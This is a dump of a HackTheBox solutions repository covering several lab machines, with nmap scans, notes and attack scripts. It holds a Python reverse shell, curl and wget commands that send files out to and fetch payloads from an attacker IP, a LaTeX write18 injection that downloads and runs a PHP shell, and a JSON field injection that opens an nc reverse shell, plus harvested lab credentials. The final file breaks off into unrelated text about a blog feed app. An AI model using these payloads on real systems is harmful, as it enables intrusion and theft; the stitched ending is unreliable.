https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/dump.png
--------------------------------------------------------------------------------
/Canape/images/etc_passwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/etc_passwd.png
--------------------------------------------------------------------------------
/Canape/images/exp2.0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/exp2.0.png
--------------------------------------------------------------------------------
/Canape/images/packets.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/packets.png
--------------------------------------------------------------------------------
/Canape/images/page1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/page1.png
--------------------------------------------------------------------------------
/Canape/images/page2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/page2.png
--------------------------------------------------------------------------------
/Canape/images/page3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/page3.png
--------------------------------------------------------------------------------
/Canape/images/page4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/page4.png
--------------------------------------------------------------------------------
/Canape/images/recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/recon.png
--------------------------------------------------------------------------------
/Canape/images/rev_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/rev_shell.png
--------------------------------------------------------------------------------
/Canape/images/root1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/root1.png
--------------------------------------------------------------------------------
/Canape/images/root2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/root2.png
--------------------------------------------------------------------------------
/Canape/images/root_dir.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/root_dir.png
--------------------------------------------------------------------------------
/Canape/images/simple_server_data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/simple_server_data.png
--------------------------------------------------------------------------------
/Canape/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Thu Sep 6 16:31:10 2018 as: nmap -sV -sC -oA nmap/initial 10.10.10.70
2 | Host: 10.10.10.70 () Status: Up
3 | Host: 10.10.10.70 () Ports: 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/ Ignored State: filtered (999)
4 | # Nmap done at Thu Sep 6 16:31:39 2018 -- 1 IP address (1 host up) scanned in 29.43 seconds
5 |
--------------------------------------------------------------------------------
/Canape/notes.txt:
--------------------------------------------------------------------------------
1 | get directory
2 |
3 | cmd = "curl --data $(pwd) 10.10.14.143:8001"
4 |
5 | ls command
6 |
7 | cmd = "ls -al / > /tmp/tmp1; curl --form 'filename=@/tmp/tmp1' 10.10.14.143:8001"
8 |
9 |
10 | upload file shell
11 |
12 | cmd = "cd /tmp; /usr/bin/wget 10.10.14.143:8002/shell.py;ls -al /tmp > /tmp/tmp1; curl --form 'filename=@/tmp/tmp1' 10.10.14.143:8001"
13 |
14 |
15 | app secret key sjhdajkh292hdq29dhashdkjsad
16 |
17 | homer passwd 0B4jyA0xtytZi7esBNGp
18 |
19 | https://github.com/0x00-0x00/FakePip
20 |
--------------------------------------------------------------------------------
/Canape/python/post-server.py:
--------------------------------------------------------------------------------
1 | import SimpleHTTPServer
2 | import SocketServer
3 |
4 | PORT = 8000
5 |
6 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
7 |
8 | def do_POST(self):
9 | content_len = int(self.headers.getheader('content-length', 0))
10 | post_body = self.rfile.read(content_len)
11 | print post_body
12 |
13 | Handler = ServerHandler
14 |
15 | httpd = SocketServer.TCPServer(("", PORT), Handler)
16 |
17 | print "serving at port", PORT
18 | httpd.serve_forever()
--------------------------------------------------------------------------------
/Canape/python/shell.py:
--------------------------------------------------------------------------------
1 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.143",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
2 |
--------------------------------------------------------------------------------
/Celestial/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/1.png
--------------------------------------------------------------------------------
/Celestial/images/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/2.png
--------------------------------------------------------------------------------
/Celestial/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/3.png
--------------------------------------------------------------------------------
/Celestial/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/4.png
--------------------------------------------------------------------------------
/Celestial/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/5.png
--------------------------------------------------------------------------------
/Celestial/images/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/6.png
--------------------------------------------------------------------------------
/Celestial/images/Error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/Error.png
--------------------------------------------------------------------------------
/Celestial/images/nmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Celestial/images/nmap.png
--------------------------------------------------------------------------------
/Chaos/files/key4.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/files/key4.db
--------------------------------------------------------------------------------
/Chaos/files/logins.json:
--------------------------------------------------------------------------------
1 | {"nextId":3,"logins":[{"id":2,"hostname":"https://chaos.htb:10000","httpRealm":null,"formSubmitURL":"https://chaos.htb:10000","usernameField":"user","passwordField":"pass","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDSAazrlUMZFBAhbsMDAlL9iaw==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNx7bW1TuuCuBBAP8YwnxCZH0+pLo6cJJxnb","guid":"{cb6cd202-0ff8-4de5-85df-e0b8a0f18778}","encType":1,"timeCreated":1540642202692,"timeLastUsed":1540642202692,"timePasswordChanged":1540642202692,"timesUsed":1}],"disabledHosts":[],"version":2}
--------------------------------------------------------------------------------
/Chaos/files/msg.txt:
--------------------------------------------------------------------------------
1 | MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
2 | RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
3 | 7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
4 | 6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
5 | +l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
6 |
7 |
--------------------------------------------------------------------------------
/Chaos/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Fri Jan 18 08:15:18 2019 as: nmap -sV -sC -oA nmap/initial 10.10.10.120
2 | Host: 10.10.10.120 (chaos) Status: Up
3 | Host: 10.10.10.120 (chaos) Ports: 80/open/tcp//http//Apache httpd 2.4.34 ((Ubuntu))/, 110/open/tcp//pop3//Dovecot pop3d/, 143/open/tcp//imap//Dovecot imapd (Ubuntu)/, 993/open/tcp//ssl|imap//Dovecot imapd (Ubuntu)/, 995/open/tcp//ssl|pop3//Dovecot pop3d/, 10000/open/tcp//http//MiniServ 1.890 (Webmin httpd)/ Ignored State: closed (994)
4 | # Nmap done at Fri Jan 18 08:16:08 2019 -- 1 IP address (1 host up) scanned in 50.66 seconds
5 |
--------------------------------------------------------------------------------
/Chaos/files/nmap/udp.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Fri Jan 18 07:59:25 2019 as: nmap -sU -T5 -oA nmap/udp 10.10.10.120
2 | Host: 10.10.10.120 (chaos) Status: Up
3 | Host: 10.10.10.120 (chaos) Ports: 10000/open/udp//ndmp///
4 | # Nmap done at Fri Jan 18 08:12:59 2019 -- 1 IP address (1 host up) scanned in 813.73 seconds
5 |
--------------------------------------------------------------------------------
/Chaos/files/nmap/udp.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Fri Jan 18 07:59:25 2019 as: nmap -sU -T5 -oA nmap/udp 10.10.10.120
2 | Warning: 10.10.10.120 giving up on port because retransmission cap hit (2).
3 | Nmap scan report for chaos (10.10.10.120)
4 | Host is up (0.054s latency).
5 | Not shown: 755 closed ports, 244 open|filtered ports
6 | PORT STATE SERVICE
7 | 10000/udp open ndmp
8 |
9 | # Nmap done at Fri Jan 18 08:12:59 2019 -- 1 IP address (1 host up) scanned in 813.73 seconds
10 |
--------------------------------------------------------------------------------
/Chaos/files/rev.php:
--------------------------------------------------------------------------------
1 | & /dev/tcp/10.10.13.211/1234 0>&1'");
3 |
--------------------------------------------------------------------------------
/Chaos/files/rev_shell.sh:
--------------------------------------------------------------------------------
1 | gnome-terminal -e "nc -lnvp 1234"
2 | gnome-terminal -e "python -m SimpleHTTPServer 8001"
3 |
4 | curl -i -s -k -X 'POST' --data 'content=\write18{wget 10.10.13.211:8001/rev.php}&template=test1' http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/ajax.php
5 |
6 | curl -i -s -k -X 'POST' --data 'content=\write18{php rev.php}&template=test1' http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3/ajax.php
7 |
8 |
--------------------------------------------------------------------------------
/Chaos/images/ayush.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/ayush.png
--------------------------------------------------------------------------------
/Chaos/images/decrypted_message.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/decrypted_message.png
--------------------------------------------------------------------------------
/Chaos/images/firefox.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/firefox.png
--------------------------------------------------------------------------------
/Chaos/images/pdf.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/pdf.png
--------------------------------------------------------------------------------
/Chaos/images/rce-test1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/rce-test1.png
--------------------------------------------------------------------------------
/Chaos/images/rce-test2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/rce-test2.png
--------------------------------------------------------------------------------
/Chaos/images/rev-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/rev-shell.png
--------------------------------------------------------------------------------
/Chaos/images/web1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/web1.png
--------------------------------------------------------------------------------
/Chaos/images/web2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/web2.png
--------------------------------------------------------------------------------
/Chaos/images/web3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/web3.png
--------------------------------------------------------------------------------
/Chaos/images/web4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/web4.png
--------------------------------------------------------------------------------
/Chaos/images/web5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Chaos/images/web5.png
--------------------------------------------------------------------------------
/Craft/files/commands.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | untrimmed=$(curl -k -s -u dinesh:4aUh0A8PbVJxgd -X GET "https://api.craft.htb/api/auth/login" -H "accept: application/json" | cut -d':' -f2)
4 | token=${untrimmed:1:-2}
5 |
6 | #echo "[*] Token:" $token
7 |
8 | curl -k -H "X-Craft-API-Token:$token" -X POST "https://api.craft.htb/api/brew/" --data '{"name":"bullshit","brewer":"bullshit", "style": "bullshit", "abv":"__import__(\"os\").system(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.13.39 8080 >/tmp/f\")"}' -H "Content-Type:application/json"
9 |
--------------------------------------------------------------------------------
/Craft/files/notes.txt:
--------------------------------------------------------------------------------
1 | dinesh:4aUh0A8PbVJxgd
2 |
3 | [{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
4 |
5 |
--------------------------------------------------------------------------------
/Craft/files/settings.py:
--------------------------------------------------------------------------------
1 | # Flask settings
2 | FLASK_SERVER_NAME = 'api.craft.htb'
3 | FLASK_DEBUG = False # Do not use debug mode in production
4 |
5 | # Flask-Restplus settings
6 | RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
7 | RESTPLUS_VALIDATE = True
8 | RESTPLUS_MASK_SWAGGER = False
9 | RESTPLUS_ERROR_404_HELP = False
10 | CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
11 |
12 | # database
13 | MYSQL_DATABASE_USER = 'craft'
14 | MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
15 | MYSQL_DATABASE_DB = 'craft'
16 | MYSQL_DATABASE_HOST = 'db'
17 | SQLALCHEMY_TRACK_MODIFICATIONS = False
18 |
19 |
--------------------------------------------------------------------------------
/Craft/images/domains.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/domains.png
--------------------------------------------------------------------------------
/Craft/images/gogs1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs1.png
--------------------------------------------------------------------------------
/Craft/images/gogs2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs2.png
--------------------------------------------------------------------------------
/Craft/images/gogs3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs3.png
--------------------------------------------------------------------------------
/Craft/images/gogs4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs4.png
--------------------------------------------------------------------------------
/Craft/images/gogs5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs5.png
--------------------------------------------------------------------------------
/Craft/images/gogs6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs6.png
--------------------------------------------------------------------------------
/Craft/images/gogs7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/gogs7.png
--------------------------------------------------------------------------------
/Craft/images/private1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/private1.png
--------------------------------------------------------------------------------
/Craft/images/private2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/private2.png
--------------------------------------------------------------------------------
/Craft/images/private3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/private3.png
--------------------------------------------------------------------------------
/Craft/images/reverse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/reverse.png
--------------------------------------------------------------------------------
/Craft/images/root1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/root1.png
--------------------------------------------------------------------------------
/Craft/images/root2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/root2.png
--------------------------------------------------------------------------------
/Craft/images/settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/settings.png
--------------------------------------------------------------------------------
/Craft/images/sql.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/sql.png
--------------------------------------------------------------------------------
/Craft/images/swagger.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/swagger.png
--------------------------------------------------------------------------------
/Craft/images/token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/token.png
--------------------------------------------------------------------------------
/Craft/images/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/user.png
--------------------------------------------------------------------------------
/Craft/images/webpage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Craft/images/webpage.png
--------------------------------------------------------------------------------
/Curling/files/data_hex:
--------------------------------------------------------------------------------
1 | 425a6839314159265359819bbb48000017fffffc41cf05f95029617661cc3a344edccccc6e11540023ab4025f802196020180ca000921c7a8340000000000000068069883468646989a6d439ea68c800000f51a00064681a069ea190000000346900078135016e18c2d78c98874a13a00868ae19c02ab0c17d792ec23c7e9d78f53e0809f0735654c27a4886dfa2e931c856921b122133856046a2ddc1730d22b9966ed40cdb87376a3a58ea64115290ad6bb12f081381208205a5f52970c50337dbab3be000ef85f439a414885018438259be5009861e4842d513ea1c2a098c8a47ab1d20a7554072ff177245385090819bbb48
2 |
--------------------------------------------------------------------------------
/Curling/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.01 scan initiated Fri Nov 16 09:26:06 2018 as: nmap -sV -sC -oA nmap/initial curling
2 | Host: 10.10.10.150 (curling) Status: Up
3 | Host: 10.10.10.150 (curling) Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/ Ignored State: closed (998)
4 | # Nmap done at Fri Nov 16 09:29:17 2018 -- 1 IP address (1 host up) scanned in 190.42 seconds
5 |
--------------------------------------------------------------------------------
/Curling/files/notes.txt:
--------------------------------------------------------------------------------
1 | Floris:Curling2018!
2 |
3 |
--------------------------------------------------------------------------------
/Curling/files/password.txt:
--------------------------------------------------------------------------------
1 | 5dUnder construction!
This is feed.py, which will become the MVP for Blogfeeder application.
TODO: replace this with the proper feed from the dev.solita.fi backend.
